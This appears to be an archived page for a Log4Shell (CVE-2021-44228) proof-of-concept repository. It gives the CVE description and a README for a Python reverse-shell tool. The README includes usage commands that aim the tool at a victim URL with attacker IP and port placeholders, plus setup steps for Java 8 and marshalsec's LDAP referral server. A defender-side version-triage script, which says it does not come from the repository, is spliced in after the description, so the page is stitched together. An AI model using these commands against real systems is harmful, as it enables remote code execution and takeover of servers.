
CVE-2021-44228 PoC — Apache Log4j2 JNDI features do not protect against attacker controlled LDAP and other JNDI related endpoints

Associated Vulnerability

Title: Apache Log4j2 JNDI features do not protect against attacker controlled LDAP and other JNDI related endpoints (CVE-2021-44228)

Description: Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects.
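As an added defender-side example (not code from the repository this page archives), the affected-version ranges quoted in the description above turned into a small triage helper for inventorying log4j-core jars. The jar paths are a constructed sample, and the "mitigated" label for 2.15.0 (lookups disabled by default, feature still present) is this example's own naming.

```python
import re

# Affected range quoted from the advisory text: log4j-core 2.0-beta9 through 2.15.0,
# excluding the backported security releases 2.12.2, 2.12.3 and 2.3.1.
SAFE_BACKPORTS = {(2, 3, 1), (2, 12, 2), (2, 12, 3)}
_VERSION_RE = re.compile(r"^(\d+)\.(\d+)(?:\.(\d+))?(?:-(alpha|beta|rc)(\d+))?$", re.I)
_JAR_RE = re.compile(r"log4j-core-([0-9][^/]*?)\.jar$")

def parse_version(text):
    """Turn '2.14.1' or '2.0-beta9' into a sortable tuple; pre-releases sort before finals."""
    m = _VERSION_RE.match(text.strip())
    if not m:
        raise ValueError(f"unrecognised log4j version: {text!r}")
    patch = int(m.group(3) or 0)
    if m.group(4):
        pre = ({"alpha": 0, "beta": 1, "rc": 2}[m.group(4).lower()], int(m.group(5)))
    else:
        pre = (3, 0)  # a final release sorts after any of its pre-releases
    return (int(m.group(1)), int(m.group(2)), patch, pre)

FIRST_AFFECTED = parse_version("2.0-beta9")
LAST_AFFECTED = parse_version("2.15.0")

def classify(version_text):
    """'affected', 'mitigated' (2.15.0 only) or 'not-affected' (outside range / backport)."""
    v = parse_version(version_text)
    if v[:3] in SAFE_BACKPORTS and v[3] == (3, 0):
        return "not-affected"
    if v < FIRST_AFFECTED or v > LAST_AFFECTED:
        return "not-affected"
    return "mitigated" if v == LAST_AFFECTED else "affected"

def triage_jars(paths):
    """Classify every log4j-core jar in a list of paths (e.g. a `find / -name '*.jar'` listing)."""
    findings = {}
    for path in paths:
        m = _JAR_RE.search(path)
        if m:  # log4j-api and other jars are not in scope of this CVE
            findings[path] = classify(m.group(1))
    return findings

# Constructed sample listing, not taken from any real host.
SAMPLE_JARS = [
    "/opt/app/lib/log4j-core-2.14.1.jar",
    "/opt/app/lib/log4j-api-2.14.1.jar",
    "/opt/legacy/log4j-core-2.12.2.jar",
    "/opt/new/log4j-core-2.16.0.jar",
]
```

Running `triage_jars(SAMPLE_JARS)` flags only the 2.14.1 jar as affected; the api jar is skipped because the CVE is specific to log4j-core.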
Description
Log4j2 CVE-2021-44228 revshell, ofc it suck!!
Readme
# Log4j2-CVE-2021-44228-revshell
## Usage

    For reverse shell:
    $~ python3 Log4j2-revshell.py -M rev -u http://www.victimLog4j.xyz:8080 -l [AttackerIP] -p [AttackerPort] -hp [HTTPServerPort]
    
    To check whether the target is exploitable:
    $~ python3 Log4j2-revshell.py -M check -u http://www.victimLog4j.xyz:8080 -l [AttackerIP] -p [AttackerPort]

    $~  python3 Log4j2-revshell.py -h
        usage: Log4j2-revshell.py [-h] -M MODE -u TARGET -l LHOST -p LPORT
                                  [-hp HTTPPORT] [-V]

        Log4j2 CVE-2021-44228 Reverse Shell

        optional arguments:
          -h, --help            show this help message and exit
          -M MODE, --mode MODE  Mode: check | rev
          -u TARGET, --target TARGET
                                Target full URL, http://www.victimLog4j.xyz:8080
          -l LHOST, --lhost LHOST
                                Attacker IP for receive revshell
          -p LPORT, --lport LPORT
                                Attacker port for receive revshell
          -hp HTTPPORT, --httpport HTTPPORT
                                HTTP server port on attacker host, default is 8888
          -V, --version         show program's version number and exit

## Requirement
    
    1. Marshalsec jndi.LDAPRefServer # see https://github.com/mbechler/marshalsec
    2. Java 8 # available at https://www.oracle.com/java/technologies/javase/javase8-archive-downloads.html,
       it is suggested to install jdk-8u181-linux-x64.tar.gz [Java 1.8.0_181]
    3. This script, Log4j2-revshell.py

## TLDR; Guided step
 
    # Open a browser and download Java 8 from https://www.oracle.com/java/technologies/javase/javase8-archive-downloads.html
    # In the Java SE Development Kit 8u181 section, select jdk-8u181-linux-x64.tar.gz or the appropriate package for your OS.
        
    $ sudo mkdir /usr/lib/jvm #Make this dir if you do not have yet
    $ cd /usr/lib/jvm
    $ sudo tar xzvf ~/Downloads/jdk-8u181-linux-x64.tar.gz #Extract downloaded jdk-8u181-linux-x64.tar.gz into /usr/lib/jvm
    $ sudo update-alternatives --install "/usr/bin/java" "java" "/usr/lib/jvm/jdk1.8.0_181/bin/java" 1
    $ sudo update-alternatives --install "/usr/bin/javac" "javac" "/usr/lib/jvm/jdk1.8.0_181/bin/javac" 1
    $ sudo update-alternatives --install "/usr/bin/javaws" "javaws" "/usr/lib/jvm/jdk1.8.0_181/bin/javaws" 1

    $ sudo update-alternatives --set java /usr/lib/jvm/jdk1.8.0_181/bin/java
    $ sudo update-alternatives --set javac /usr/lib/jvm/jdk1.8.0_181/bin/javac
    $ sudo update-alternatives --set javaws /usr/lib/jvm/jdk1.8.0_181/bin/javaws
    $ java -version #verify if you are running Java 1.8.0_181
    
    $ git clone https://github.com/mbechler/marshalsec /tmp/Log4j2-dir; cd /tmp/Log4j2-dir #Fetch marshalsec (provides jndi.LDAPRefServer)
    $ sudo apt install -y maven #marshalsec is built with maven; install it first if you do not have it
    $ mvn clean package -DskipTests #Build the marshalsec tool with maven
    $ cd /tmp/Log4j2-dir; wget -q https://raw.githubusercontent.com/faisalfs10x/Log4j2-CVE-2021-44228-revshell/main/Log4j2-revshell.py
    
    $ python3 Log4j2-revshell.py -M rev -u http://www.victimLog4j.xyz:8080 -l [AttackerIP] -p [AttackerPort] -hp [HTTPServerPort]
    

## PoC

    target host: http://192.168.5.122:8080
    attacker host: 192.168.5.120

https://user-images.githubusercontent.com/51811615/146068317-23af25f4-9e5b-42bb-960b-6775edd5be03.mp4


## Tested on
    
    - Ubuntu 18.04

## Disclaimer:

    The script is for security analysis and research only, hence I would not be liable if it is used for illicit activities
File Snapshot

    [4.0K] /data/pocs/19badd7675867a448944af94f100df7c6c5bc2d7
    ├── [ 10K] Log4j2-revshell.py
    └── [3.6K] README.md

    0 directories, 2 files